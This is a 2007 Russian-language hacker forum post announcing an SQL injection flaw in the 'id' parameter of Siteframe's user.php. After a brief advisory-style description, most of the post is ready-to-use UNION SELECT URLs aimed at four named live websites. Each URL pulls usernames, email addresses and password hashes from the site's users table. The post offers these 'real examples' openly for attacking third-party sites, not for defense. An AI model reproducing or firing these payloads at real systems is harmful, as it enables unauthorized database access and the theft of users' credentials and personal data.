Sql injection в Siteframe

Discussion in 'Уязвимости' started by kamaz, 26 May 2007.

  1. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Надеюсь, не боян :)

    Программа: Siteframe любой версии

    Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии user.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
    Пример:
    Code:
    http://site/user.php?id=-1[sql injection]
    Url производителя: http://siteframe.org/

    Реальные примеры:
    Siteframe.org:
    Code:
    http://v3.siteframe.org/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*
    Code:
    http://myolympus.org/user.php?id=-1%20union%20select%201,2,3,4,5,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*
    Code:
    http://fujirangefinder.com/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*
    Code:
    http://www.zooptek.net/siteframe/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*
    Воть :)
     
    1 person likes this.